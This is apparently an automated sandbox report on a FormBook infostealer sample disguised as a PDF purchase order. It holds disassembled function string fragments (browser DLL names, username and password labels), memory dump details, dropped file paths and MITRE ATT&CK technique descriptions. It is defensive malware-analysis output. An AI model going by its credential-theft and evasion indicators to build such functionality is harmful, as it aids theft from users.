Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 09C1607461CA194FC758EF68E496AAAF7E1FB94300F914329A44EC7251DF30E982CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 108272F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 108274DB
sspi, xrefs: 10827320
cli., xrefs: 10827327
dragon_s.dll, xrefs: 10827614
opera_browser.dll, xrefs: 10827629
l, xrefs: 108274E2
dll, xrefs: 1082732E
nspr, xrefs: 108274D4

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 8ef1f9e3013c0a58a94176751e2c967d9f49ba2363a3b16a4c1de6e49ee97ed3
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: FCC1607461CA194FC758EF68E496AAAF7E1FB94300F914329A44EC7251DF30E982CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 10828CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

User, xrefs: 10828DAB
UR, xrefs: 10828D5F
Pass, xrefs: 10828D97
word, xrefs: 10828D9E
name, xrefs: 10828DB2
L: , xrefs: 10828D66
2, xrefs: 10828DE1

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 53f0b994ce18ee1abd2079d30858594c20cba9fe5758e7a30ffd31cfd9679c77
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 66A1907061CA4C8BDB18DFA894557EEB7E1FF98300F40462DE48AD7252EE709586CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10828CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

User, xrefs: 10828DAB
UR, xrefs: 10828D5F
Pass, xrefs: 10828D97
word, xrefs: 10828D9E
name, xrefs: 10828DB2
L: , xrefs: 10828D66
2, xrefs: 10828DE1

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 7768d903aa6e848695680d7626cc326799474c7e49684def7d82cdfa00f3ad3a
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 5E91707061CB4C8BDB18DFA894547EEB7E1FB98300F40462EE48AD7252DF709546CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10828352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 108284A0
, xrefs: 1082847C
e, xrefs: 1082848E
n, xrefs: 108283E7
., xrefs: 108283B0

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 832ec4b2d4ca5f00099c2cf1ea0aff99e0774f75ba2d3ad4ef8aea63e7117c47
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 87719F3161CA498FDB58DFA8D4857AAB7F0FF98305F40062EE44AC7261EB70E945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10823C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 10823C5D
shel, xrefs: 10823C90
2.dl, xrefs: 10823C64
dll, xrefs: 10823C9E
l32., xrefs: 10823C97

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 02ae05a105d9d481fc785785744cbb90ff03cab2d92c1099d60bf51d12403af5
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: B4515EB0918B4C8BDB54DFA8D0456EEB7F1FF58301F80462EA49AD7254DF70A581CB89

Uniqueness

Uniqueness Score: -1.00%

Function 1082486F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

4, xrefs: 108249E9
dll, xrefs: 108248F4
\, xrefs: 108249E0
vers, xrefs: 108248E4
ion., xrefs: 108248EC

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 713382d5c5df1039fbff6ef52d6fadce9b5d744b8bf03cec031efcb79d341e9f
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: BC416F3461CB8C8BCBA5EF6898457EA77E4FB98301F81562E984EC7240EF30D585C786

Uniqueness

Uniqueness Score: -1.00%

Function 108264B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 108264D3
cli., xrefs: 10826515
32.d, xrefs: 108264DA
sspi, xrefs: 1082650E
dll, xrefs: 1082651C

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: e0a8470e3f50ada66b65eb1e75a8f448f0b0aebfbaaa508b78f0168261c5b125
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 5F416030A1CE0D8FCB84EF58A1957AD77E1FB58345F81416EA80AD7244DA71D990CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 10824432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 1082452A
el32, xrefs: 10824537
.dll, xrefs: 1082453F
h, xrefs: 1082451F

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 6f97f4825a4121964a531bcb246631cb7894f5778086de8918ce02c9a66cda0b
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 9541807060CB498FD799DF2C90843AAB7E1FBA8340F504A6E949EC3255DF70D985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1082B0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 1082B146
Snif, xrefs: 1082B154
f fr, xrefs: 1082B13D
, xrefs: 1082B184

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 9bdc9f4b572d0e1bd5e9dde656e16bc7ffe29e9b08c236a9637440b76e25eb38
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 1931F27050DB885FD71ADB28D0956DAB7D0FB84300F90491EE49BC7292EE34A54ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 1082B0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 1082B146
Snif, xrefs: 1082B154
f fr, xrefs: 1082B13D
, xrefs: 1082B184

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 5159eb17783c2640193be5fce8c9a01f5525be9d1b0db0f01872f09d353d6aaa
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 9231027040CB486FD71ADB28D4856EAB3D0FB94300F90492EF49BC7282EE30E54ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 10826FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 10827023
me_c, xrefs: 10826FEE
.dll, xrefs: 10826FFE
hild, xrefs: 10826FF6

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: e256f745742d5b6c764ab5e7291215d3db672a1ff8d427d95b406e9ee5f082a9
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 42317C3411CA084FC784EF699496BAAB7E1FB98300FC0562DA48ECB255DF30D985CB96

Uniqueness

Uniqueness Score: -1.00%

Function 10826FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 10827023
me_c, xrefs: 10826FEE
.dll, xrefs: 10826FFE
hild, xrefs: 10826FF6

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 5eded90549d0018f5024df5644254a6592336c9fc1f0b87c178f2af75c6e8df8
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 82318D3411CB084FC784EF699495BAAB7E1FB98300FC0562DA44ACB255CF30D985CB96

Uniqueness

Uniqueness Score: -1.00%

Function 108298C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 10829959
User-Agent: , xrefs: 10829935, 10829948
on.d, xrefs: 10829902
nt: , xrefs: 1082991E

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 35f82acd9b039c7d5a5cddd7dde7126c4337156d3e3e3395e5da9488a35cbbef
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: E631D131618A0C8BCB44EFA8D8957EDBBE0FB58215F40022AE44ED7240DE789685CB89

Uniqueness

Uniqueness Score: -1.00%

Function 108298BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 10829959
User-Agent: , xrefs: 10829935, 10829948
on.d, xrefs: 10829902
nt: , xrefs: 1082991E

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 201bfba492b8cb01e018e4a0bfb6d07d438baabfe75f9779b3defb418e488e14
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2B210470618A0C8BCF04EFA8D8957EDBBE0FF58245F80022EE45AD7240DF749685CB89

Uniqueness

Uniqueness Score: -1.00%

Function 1082AE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 1082AEF4
., xrefs: 1082AF1F
l, xrefs: 1082AF03
l, xrefs: 1082AF26

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: d4a5449a0ed552f46ef57d70eef2a4b7bbc4d6813a214c76c6aa82a6c1d24d8f
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 60217C74A28A0D9BDB48EFA8D0547ADBAF0FF58304F50462EE00DD7600DB74E592CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1082AE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 1082AEF4
., xrefs: 1082AF1F
l, xrefs: 1082AF03
l, xrefs: 1082AF26

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: c3873c9cdac31b020cc67bcc30b5dfe80f97249d3d8754094d839cc24d6d3e35
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 4D217C74A28A0D9BDB48EFA8D0557EDBBF0FB58304F50462EE009D7600DB74E592CB88

Uniqueness

Uniqueness Score: -1.00%

Function 1082AFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 1082B03C
user, xrefs: 1082B015
pass, xrefs: 1082B022
auth, xrefs: 1082B02F

Memory Dump Source

Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 705a86423a3ecb5ae4149cd3069d3e6bcf76d1e92d1698f0d4455bb11be4e3ac
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: F221CD30618B0D8BCB46CF9D98916DFB7E1EFC8344F004619E41AEB245D7B0E9558BC2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-230821_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\cuzsxkdex.k

C:\Users\user\AppData\Local\Temp\nsa6B1F.tmp

C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
PO-230821_pdf.exe

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 024508B7 Relevance: 6.4, APIs: 4, Instructions: 399
COMMON

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 100010B0 Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 109
libraryloadermemoryCOMMON

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 02450DC0 Relevance: 10.7, APIs: 7, Instructions: 194
filememoryCOMMON

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

